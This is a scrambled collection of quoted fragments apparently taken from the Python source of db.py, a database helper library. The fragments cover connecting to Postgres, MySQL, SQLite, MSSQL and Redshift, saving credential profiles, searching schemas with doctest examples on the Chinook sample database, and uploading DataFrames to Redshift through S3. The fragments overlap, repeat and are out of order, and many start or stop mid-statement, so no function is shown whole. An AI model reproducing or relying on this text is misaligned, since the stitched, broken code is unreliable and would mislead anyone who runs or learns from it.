Please ensure it is installed\") creds = {} for arg", "7 Let's Get It Up 1 1 7 8 Inject The Venom 1", "profiles = {} user = os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile", "1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834 8 1", "query = template(data) query = str(query) else: return q return query def query(self,", "The Venom 1 1 8 9 Snowballed 1 1 9 10 Evil Walks", "NVARCHAR(120) | | Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns", "getattr(table, col).type not in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return", "when it comes time to run the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html", "col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} # generate our Columns, and", "we're going to chunk the file into pieces. according to amazon, this is", "tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\") # returns all tables prefixed", "if you're a db admin you might actually want to query the system", "u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets':", "copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name,", "per node, so if running 2 nodes you will want chunk_size=4, 8, etc", "7 8 Inject The Venom 1 1 8 9 Snowballed 1 1 9", "profile) if f: prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save", "load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return prof.get('tables', None)", "psycopg2 
library. Please ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port,", "directly from cache # 2. use a single query for getting all key", "f = profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username = creds.get('username') self.password", "getattr(self, arg): value = getattr(self, arg) if arg==\"username\": arg = \"user\" elif arg==\"password\":", "AWS_ACCESS_KEY: str your aws access key. if this is None, the function will", "function will try and grab AWS_SECRET_KEY from your environment variables s3: S3 alternative", "db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>>", "self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. Please ensure it is", "is installed\") creds = {} for arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]:", "Album 347 1 Artist 275 2 Track 3503 >>> q = ''' ...", "None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port':", "= 5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port = 3306 elif", "for what you're looking for data_type: str, list (optional) specify which data type(s)", "db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\",", "3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port = 1433 elif profile", "'{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, 
use_cache=False): \"\"\" Pulls your database's schema", "in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas", "None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY =", "db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432,", "Rock We Salute You 1 1 2 Balls to the Wall 2 2", "| BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER | |", "+ \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down bucket...\")", "\"w\") as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title", "representation of the database as credentials plus tables dict representation.\"\"\" db_dict = self.credentials", "you'd like to drop the table if it already exists chunk_size: int (10000)", "to display in the foreign and reference keys. This is used to control", "| Table | Columns | +--------+--------------------------+ | Album | AlbumId, Title, ArtistId |", "INTEGER | | Track | AlbumId | INTEGER | | Track | MediaTypeId", "ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\"", "self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given profile. 
Profiles are", "DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns |", ">>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials)", "db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About To Rock We Salute You", "loaded reference to the table metadata for the DB.\"\"\" if len(self._tables) == 0:", "\"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict): query = template(data) query", "sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta = {} #", "if s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY", "actually want to query the system tables. limit: int, None Default number of", "data_type=\"NVARCHAR(70)\") # returns all columns containing Address that are varchars +----------+----------------+--------------+ | Table", "Provides an instance of DB that hooks up to the Chinook DB See", "else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor()", "password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\",", "self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None return { \"username\": self.username,", "if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables: profile['metadata']", "to return Examples ---------- >>> from db import DemoDB >>> db = DemoDB()", "0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): 
\"\"\"Dict representation of", "dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db", "the db drop_if_exists: bool (False) whether you'd like to drop the table if", "str, list (optional) specify which data type(s) you want to return Examples ----------", "all columns named \"Name\" +-----------+-------------+---------------+ | Table | Column Name | Type |", "want to save to the db drop_if_exists: bool (False) whether you'd like to", "self.port = creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas", "of them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\",", "least ones that fit into our framework), so we're going to create them.", "This is used by the DB.query method. You can override it by adding", "self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for (table_name, sql) in self.cur: rgx =", "that will be executed bucket_location: boto.s3.connection.Location a specific AWS location in which to", "def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000,", "db.find_table(\"*Invoice*\") # returns all tables containing trans >>> results = db.find_table(\"*\") # returns", "metatables (at least ones that fit into our framework), so we're going to", "= DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\",", "InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER | | InvoiceLine", "is None: raise Exception(\"Database type not specified! 
Must select one of: postgres, sqlite,", "http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite')", "col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if", "% schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta", "# lazily importing boto only if necessary here. if bucket_location is None: bucket_location", "''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347", "This will return any handlebars queries as a single data frame. limit: int", "| NVARCHAR(70) | | Employee | Address | NVARCHAR(70) | | Invoice |", "\"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID,", "ending w/ Id +---------------+---------------+---------+ | Table | Column Name | Type | +---------------+---------------+---------+", "| Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns", "# returns all tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\") # returns", "db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+ | Table | Column Name", "covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost',", "for key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict", "the database as credentials plus tables dict 
representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return", "sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in self._metadata_cache: # table metadata table_meta[table['name']]", "and Wild 0.99 4 Princess of the Dawn 0.99 5 Put The Finger", "not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache", "Please wait...\") for table in self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k]", "union=True, limit=None): \"\"\" Query your database with a raw string. Parameters ---------- q:", "second value in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys =", "\"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0", "import sys from collections import defaultdict import pandas as pd import pybars from", "is running on. defaults to default port for db. portgres: 5432 redshift: 5439", "= db.find_table(\"*\") # returns everything \"\"\" tables = [] for table in self.tables:", "| | Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all", "Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Employee |", "bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the file into pieces.", "args=(i, )) t.start() threads.append(t) # join all threads for t in threads: t.join()", "db admin you might actually want to query the system tables. limit: int,", "if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. 
Please ensure it is installed\")", "table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the", "= {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata:", "credentials, plus the database properties to your db.py profile.\"\"\" if len(self.tables) > 0:", "you want to return Examples ---------- >>> from db import DemoDB >>> db", "= \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] = value self.con = mysql_connect(**creds)", "| NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine |", "arg): value = getattr(self, arg) if arg==\"username\": arg = \"user\" elif arg==\"password\": arg", "q = ''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM", "@property def credentials(self): \"\"\"Dict representation of all credentials for the database.\"\"\" if self.filename:", "for row in self.cur.execute(\"select name from sqlite_master where type='table';\")] for table in tables:", "str glob pattern for what you're looking for data_type: str, list (optional) specify", "Name | NVARCHAR(120) | | Genre | Name | NVARCHAR(120) | | MediaType", "in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert =", "else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self,", "db import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID,", "if isinstance(data_type, str): data_type = [data_type] cols = [] for table in self.tables:", "| | InvoiceLine | InvoiceId | INTEGER | | MediaType | MediaTypeId |", "k.key = '<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO()", "table[k] for k in ('schema', 
'name', 'foreign_keys', 'ref_keys')} # col metadata: format as", "\"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\":", "= db.find_table(\"*Invoice*\") # returns all tables containing trans >>> results = db.find_table(\"*\") #", "# second value in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate", "True except ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL = True except", "TrackId | INTEGER | | PlaylistTrack | PlaylistId | INTEGER | | Track", "| Track | MediaTypeId | INTEGER | | Track | Milliseconds | INTEGER", "wait...\") for table in self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k] for", "| Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/", "True except ImportError: HAS_PG = False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL", "(i.e. 
\"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f)", "len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1 For", "try: self.cur.execute(cmd) except Exception as e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd))", "self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and", "| Invoice | CustomerId | INTEGER | | InvoiceLine | TrackId | INTEGER", "Table | Columns | +--------+--------------------------+ | Album | AlbumId, Title, ArtistId | |", "= True except ImportError: HAS_PG = False try: import MySQLdb mysql_connect = MySQLdb.connect", "if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database as", "AlbumId MediaTypeId \\\\\\r 0 1 For Those About To Rock (We Salute You)", "to operate). This includes things like schema definitions. Most of you probably don't", "\"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self, arg) if arg==\"username\": arg =", "self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype", "printing sql statement that will be executed bucket_location: boto.s3.connection.Location a specific AWS location", "limitless. Bradley Cooper style.) 
keys_per_column: int, None Default number of keys to display", "| Table | Column Name | Type | +---------------+---------------+---------+ | Album | AlbumId", "ensure it is installed\") creds = {} for arg in [\"username\", \"password\", \"hostname\",", "= 3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port = 1433 elif", "= exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference to", "None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as", "','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q", "into pieces. according to amazon, this is # much faster when it comes", "attempt to import the relevant database libraries # TODO: maybe add warnings? try:", "self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't", "we can't do this in the function definition because we're # lazily importing", "import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>>", ">>> q = ''' ... SELECT ... {{#cols}} ... {{#if @last}} ... 
{{", "del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given", "\"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username", "columns have an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table |", "can override it by adding limit={X} to the `query` method, or by passing", "5432, u'username': u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\") for f in", "| SupportRepId | INTEGER | | Customer | CustomerId | INTEGER | |", "and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con,", "foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for (table_name,", "{0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from pandas and", "for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite') return", "database credentials, plus the database properties to your db.py profile.\"\"\" if len(self.tables) >", "| INTEGER | | PlaylistTrack | TrackId | INTEGER | | PlaylistTrack |", "to return in a query. This is used by the DB.query method. You", "load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given profile. Profiles are stored in", "arg = \"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor()", "search through your database's schema for a table. 
Parameters ----------- search: str glob", "the table if it already exists chunk_size: int (10000) Number of DataFrame chunks", "Artist | ArtistId | INTEGER | | Customer | SupportRepId | INTEGER |", "| | Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId |", "try and grab AWS_SECRET_KEY from your environment variables s3: S3 alternative to using", "them. \"\"\" sys.stderr.write(\"Indexing schema. This will take a second...\") rows_to_insert = [] tables", "> {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self):", "AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify", "database needs in order to operate). This includes things like schema definitions. Most", "DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of DB that hooks up to the", "Customer | SupportRepId | INTEGER | | Customer | CustomerId | INTEGER |", "CustomerId | INTEGER | | Employee | EmployeeId | INTEGER | | Genre", "INTEGER | | Track | MediaTypeId | INTEGER | | Track | GenreId", "is present, set the bucket_location to default. # we can't do this in", "table_name, column_name, data_type) in cols: if table_name not in tables: tables[table_name] = []", "a file. Parameters ---------- filename: str A SQL script data: list, dict Optional", "database's schema for a table. 
Parameters ----------- search: str glob pattern for what", "| INTEGER | | Invoice | InvoiceId | INTEGER | | Invoice |", "self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master", "is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys =", "in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql", "self.cur: # second value in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) #", "\"localhost\", database=self.dbname or '' ) conn_str = ((self.username and self.password) and \"{}{}\".format( base_con,", "foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys:", "NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"])", "db = DemoDB() >>> q = ''' ... SELECT ... a.Title, ... t.Name,", "into our framework), so we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema. This", "Let's Get It Up 0.99 7 Inject The Venom 0.99 8 Snowballed 0.99", "[row[0] for row in self.cur.execute(\"select name from sqlite_master where type='table';\")] for table in", "fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with", "9 8611245 0.99 >>> q = ''' ... SELECT ... a.Title, ... 
t.Name,", "= username self.password = password self.hostname = hostname self.port = port self.filename =", "name, sql FROM sqlite_master ;\") for (table_name, sql) in self.cur: rgx = \"FOREIGN", "except: raise Exception(\"Profile '{0}' does not exist. Could not find file {1}\".format(name, f))", "plus the database properties to your db.py profile.\"\"\" if len(self.tables) > 0: f", "s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) #", "Port the database is running on. defaults to default port for db. portgres:", "unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None,", ">>> data = [ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"}", "redshift via s3. Parameters ---------- name: str name for your shiny new table", "psycopg2 as pg HAS_PG = True except ImportError: HAS_PG = False try: import", "out column metadata for all tables as list of tuples if told to", "ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None,", "TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search through your database's schema for", "prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the database properties", "| InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER | |", "DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"):", "sql like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\")", "# we'll create the table ONLY if it 
doens't exist sql = sql.replace(\"CREATE", "you might actually want to query the system tables. limit: int, None Default", "= creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas =", "in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q = \"select", "| INTEGER | | Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine |", "row[2])) # find for table and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\")", "port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError:", "int Port the database is running on. defaults to default port for db.", "| Name | NVARCHAR(120) | | Playlist | Name | NVARCHAR(120) | |", "t ... on a.AlbumId = t.AlbumId; ... ''' >>> len(db.query(q)) 3503 db.query(q, limit=10)", "the table ONLY if it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE", "None Driver for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from", "execute data: list, dict Optional argument for handlebars-queries. Data will be passed to", "| | Playlist | PlaylistId | INTEGER | | PlaylistTrack | TrackId |", "dataframe to redshift via s3. Parameters ---------- name: str name for your shiny", "Be Rock 1 4 5 Big Ones 3 \"\"\" if data: q =", "bool (False) option for printing sql statement that will be executed bucket_location: boto.s3.connection.Location", "= {} # pull out column metadata for all tables as list of", "you're a db admin you might actually want to query the system tables.", "to the Wall 2 2 2 3 Fast As a Shark 3 2", "where rows are not in the same order, making doctest fail. 
db.find_column(\"Name\") #", "dict): query = template(data) query = str(query) else: return q return query def", "= os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function", "MediaType | MediaTypeId | INTEGER | | Playlist | PlaylistId | INTEGER |", "As a Shark 0.99 3 Restless and Wild 0.99 4 Princess of the", "| Employee | ReportsTo | INTEGER | | Employee | EmployeeId | INTEGER", "template(data) query = str(query) else: return q return query def query(self, q, data=None,", "\"\"\" Aggresively search through your database's schema for a table. Parameters ----------- search:", "exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is None: if dbtype==\"postgres\": port =", "#this way users with permission on specific buckets can use this feature bucket_name", "username self.password = password self.hostname = hostname self.port = port self.filename = filename", "Could not find file {1}\".format(name, f)) os.remove(f) except Exception as e: raise Exception(\"Could", "profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]] = profile return profiles def", "SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM ... Album a ...", "to each table to the table name in dict for (table_schema, table_name, column_name,", "str Query string to execute data: list, dict Optional argument for handlebars-queries. Data", "bucket. This should match your redshift cluster's region. 
Examples -------- \"\"\" if self.dbtype!=\"redshift\":", "user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars", "db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def", "Playlist | PlaylistId | INTEGER | | PlaylistTrack | TrackId | INTEGER |", "our Columns, and attach to each table to the table name in dict", "if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self):", "... GROUP BY ... table_name ... ''' >>> data = [ ... {\"name\":", "return any handlebars queries as a single data frame. limit: int Number of", "Should sort in some way for all those doctests to be viable... -=", "= True except ImportError: HAS_SQLITE = False try: import pyodbc as pyo HAS_ODBC", "boto.s3.connection import Location # if boto is present, set the bucket_location to default.", "| INTEGER | | MediaType | MediaTypeId | INTEGER | | Playlist |", "db_filename = None return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port,", "2 Fast As a Shark 0.99 3 Restless and Wild 0.99 4 Princess", "environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as either", "2.7 except: from io import StringIO # Python 3.3+ import uuid import re", "defaultdict(list) for rel in self.cur: # second value in relationship tuple is the", "_ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite') return DB(filename=chinook, dbtype='sqlite', keys_per_column=keys_per_column, **kwargs)", "len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", 
data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should", "] >>> db.query(q, data=data) table_name cnt 0 Album 347 1 Artist 275 2", "pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname", "`AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as either function argument", "SQLite doesn't come with any metatables (at least ones that fit into our", ") conn_str = ((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password", "ArtistId | INTEGER | | Artist | ArtistId | INTEGER | | Customer", "5 6 Put The Finger On You 1 1 6 7 Let's Get", "for i in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join", "| | Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str):", "None and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for", "self.cur.execute(cmd) except Exception as e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print", "password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if", "<BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334", "self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively", "2. use a single query for getting all key relationships # 3. use", "Exception(\"Could not remove profile {0}! 
